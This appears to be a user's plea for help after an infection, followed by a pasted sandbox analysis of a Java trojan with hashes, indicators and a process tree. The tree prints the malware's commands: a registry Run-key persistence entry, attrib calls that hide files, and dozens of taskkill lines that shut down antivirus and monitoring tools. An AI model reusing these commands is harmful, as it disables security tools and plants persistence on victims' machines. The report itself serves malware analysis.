My entire system has been hacked. Can you help?
Logo malicious Threat Score: 100/100 AV Multiscan: 45% Labeled as: Java.Trojan.GenericGB Tagged as: #trojan [Privacy Badger has replaced this Twitter button.] 9879438b7ff8f9f03ac525addc4d5d18.bz2
Analyzed on November 20th 2017 00:37:46 (CEST) running the Kernelmode monitor Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1 VxStream Sandbox v7.10 © Hybrid Analysis Incident Response Risk Assessment
Persistence Modifies auto-execute functionality by setting/creating a value in the registry Modifies auto-execute functionality to enable the debugger hack Spawns a lot of processes Writes data to a remote process Fingerprint Reads the active computer name Reads the cryptographic machine GUID Evasive Possibly checks for the presence of a forensics/monitoring tool Adware Possibly checks for the presence of an adware detecting tool
Platform Intelligence Artifact Context
Associated SHA256s 9e89ea0a97123e1522a04feb49496ee58ae9fb09e6219de9f4e3fd780a9b529d c151cf3050ccf82e92465fd24ae3ba77a43c08f7cbdab1abe2ff2697bc981183
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
Malicious Indicators 10 Anti-Detection/Stealthyness Modifies auto-execute functionality to enable the debugger hack Terminates other processes using taskkill External Systems Sample was identified as malicious by a large number of Antivirus engines Sample was identified as malicious by at least one Antivirus engine General The analysis extracted a file that was identified as malicious Installation/Persistance Writes data to a remote process System Security Terminates system processes Uses taskkill excessively (often used to disable security tools) Unusual Characteristics Spawns a lot of processes Hiding 1 Malicious Indicators All indicators are available only in the private webservice or standalone version
Suspicious Indicators 15 Anti-Detection/Stealthyness Runs the registry editor in a silent manner Anti-Reverse Engineering Creates guarded memory regions (anti-debugging trick to avoid memory dumping) Possibly checks for the presence of a forensics/monitoring tool Cryptographic Related References key cryptographic functions Environment Awareness Reads the active computer name Reads the cryptographic machine GUID Installation/Persistance Copies data to/from the Java Runtime folder Creates new processes Executes a visual basic script Modifies auto-execute functionality by setting/creating a value in the registry Remote Access Related Contains references to WMI/WMIC System Destruction Possibly checks for the presence of an adware detecting tool Unusual Characteristics Installs hooks/patches the running process Reads information about supported languages Hiding 1 Suspicious Indicators All indicators are available only in the private webservice or standalone version
Informative 7 General Creates a writable file in a temporary directory Launches a VBS file Reads Windows Trust Settings Runs shell commands Spawns new processes Installation/Persistance Dropped files Touches files in the Windows directory
File Details All Details: phpworBHo_.jar
Filename phpworBHo_.jar Size 513KiB (525607 bytes) Type java Description Java archive data (JAR) Architecture WINDOWS SHA256 7b965b8a19a7b2ccfb2034b81a8b020247a284638fb3032d1b38337e6dc8943aCopy SHA256 to clipboard
Resources
Icon Sample Icon
Visualization
Input File (PortEx) PE Visualization
Classification (TrID)
100.0% (.ZIP) ZIP compressed archive
Screenshots
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 222 processes in total (System Resource Monitor).
javaw.exe -jar "C:phpworBHo_.jar" (PID: 3068) java.exe -jar %TEMP%_0.4121897489030028643705085698298392.class (PID: 3728) cmd.exe /C cscript.exe %TEMP%Retrive3005839175773921224.vbs (PID: 4044) cscript.exe %TEMP%Retrive3005839175773921224.vbs (PID: 308) cmd.exe /C cscript.exe %TEMP%Retrive8519028878817837879.vbs (PID: 3940) cscript.exe %TEMP%Retrive8519028878817837879.vbs (PID: 4036) cmd.exe (PID: 1036) cmd.exe /C cscript.exe %TEMP%Retrive3791202351905831748.vbs (PID: 3836) cscript.exe %TEMP%Retrive3791202351905831748.vbs (PID: 3756) cmd.exe /C cscript.exe %TEMP%Retrive6761054475108374641.vbs (PID: 3844) cscript.exe %TEMP%Retrive6761054475108374641.vbs (PID: 1764) xcopy.exe "xcopy "%PROGRAMFILES%Javajre1.8.0_25" "%APPDATA%Oracle" /e (PID: 1300) cmd.exe (PID: 3960) reg.exe "reg add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v wHiDpcbHAYm /t REG_EXPAND_SZ /d ""%APPDATA%Oracleinjavaw.exe" -jar "%USERPROFILE%ICHxjJDnrDtSxDRkMDReHZ.DrcPWt"" /f (PID: 1024) attrib.exe "attrib +h "%USERPROFILE%ICHxjJDnrDt*.*" (PID: 2304) attrib.exe "attrib +h "%USERPROFILE%ICHxjJDnrDt" (PID: 1804) javaw.exe -jar %USERPROFILE%ICHxjJDnrDtSxDRkMDReHZ.DrcPWt (PID: 2352) java.exe -jar %TEMP%_0.467237802677680345016958333484578610.class (PID: 2392) cmd.exe /C cscript.exe %TEMP%Retrive3731418051498572090.vbs (PID: 2684) cscript.exe %TEMP%Retrive3731418051498572090.vbs (PID: 2832) cmd.exe /C cscript.exe %TEMP%Retrive7044146437686179666.vbs (PID: 2812) cscript.exe %TEMP%Retrive7044146437686179666.vbs (PID: 2732) cmd.exe (PID: 2872) cmd.exe /C cscript.exe %TEMP%Retrive7628837890759371353.vbs (PID: 1228) cscript.exe %TEMP%Retrive7628837890759371353.vbs (PID: 2212) cmd.exe /C cscript.exe %TEMP%Retrive3530126421885876512.vbs (PID: 2624) cscript.exe %TEMP%Retrive3530126421885876512.vbs (PID: 2696) cmd.exe (PID: 2736) taskkill.exe taskkill /IM ProcessHacker.exe /T /F (PID: 3048) cmd.exe /c regedit.exe /s %TEMP%YSqRLNkmok2423403084465319161.reg (PID: 3044) regedit.exe /s %TEMP%YSqRLNkmok2423403084465319161.reg (PID: 3064) taskkill.exe taskkill /IM procexp.exe /T /F (PID: 3224) taskkill.exe taskkill /IM MSASCui.exe /T /F (PID: 1808) taskkill.exe taskkill /IM MsMpEng.exe /T /F (PID: 3024) taskkill.exe taskkill /IM MpUXSrv.exe /T /F (PID: 3928) taskkill.exe taskkill /IM MpCmdRun.exe /T /F (PID: 3948) taskkill.exe taskkill /IM NisSrv.exe /T /F (PID: 3972) taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F (PID: 320) taskkill.exe taskkill /IM procexp.exe /T /F (PID: 1616) taskkill.exe taskkill /IM wireshark.exe /T /F (PID: 2200) taskkill.exe taskkill /IM tshark.exe /T /F (PID: 3636) taskkill.exe taskkill /IM text2pcap.exe /T /F (PID: 2232) taskkill.exe taskkill /IM rawshark.exe /T /F (PID: 2708) taskkill.exe taskkill /IM mergecap.exe /T /F (PID: 2640) taskkill.exe taskkill /IM editcap.exe /T /F (PID: 2784) taskkill.exe taskkill /IM dumpcap.exe /T /F (PID: 820) taskkill.exe taskkill /IM capinfos.exe /T /F (PID: 2120) taskkill.exe taskkill /IM mbam.exe /T /F (PID: 3060) taskkill.exe taskkill /IM mbamscheduler.exe /T /F (PID: 3072) taskkill.exe taskkill /IM mbamservice.exe /T /F (PID: 3288) taskkill.exe taskkill /IM AdAwareService.exe /T /F (PID: 2952) taskkill.exe taskkill /IM AdAwareTray.exe /T /F (PID: 3292) taskkill.exe taskkill /IM WebCompanion.exe /T /F (PID: 3388) taskkill.exe taskkill /IM AdAwareDesktop.exe /T /F (PID: 3452) taskkill.exe taskkill /IM V3Main.exe /T /F (PID: 3484) taskkill.exe taskkill /IM V3Svc.exe /T /F (PID: 3576) taskkill.exe taskkill /IM V3Up.exe /T /F (PID: 3580) taskkill.exe taskkill /IM V3SP.exe /T /F (PID: 584) taskkill.exe taskkill /IM V3Proxy.exe /T /F (PID: 976) taskkill.exe taskkill /IM V3Medic.exe /T /F (PID: 3664) taskkill.exe taskkill /IM BgScan.exe /T /F (PID: 512) taskkill.exe taskkill /IM BullGuard.exe /T /F (PID: 1536) taskkill.exe taskkill /IM BullGuardBhvScanner.exe /T /F (PID: 312) taskkill.exe taskkill /IM BullGuarScanner.exe /T /F (PID: 324) taskkill.exe taskkill /IM LittleHook.exe /T /F (PID: 3976) taskkill.exe taskkill /IM BullGuardUpdate.exe /T /F (PID: 3984) taskkill.exe taskkill /IM clamscan.exe /T /F (PID: 3712) taskkill.exe taskkill /IM ClamTray.exe /T /F (PID: 4076) taskkill.exe taskkill /IM ClamWin.exe /T /F (PID: 4064) taskkill.exe taskkill /IM cis.exe /T /F (PID: 3740) taskkill.exe taskkill /IM CisTray.exe /T /F (PID: 1928) taskkill.exe taskkill /IM cmdagent.exe /T /F (PID: 1424) taskkill.exe taskkill /IM cavwp.exe /T /F (PID: 2632) taskkill.exe taskkill /IM dragon_updater.exe /T /F (PID: 2772) taskkill.exe taskkill /IM MWAGENT.EXE /T /F (PID: 2948) taskkill.exe taskkill /IM MWASER.EXE /T /F (PID: 2992) taskkill.exe taskkill /IM CONSCTLX.EXE /T /F (PID: 280)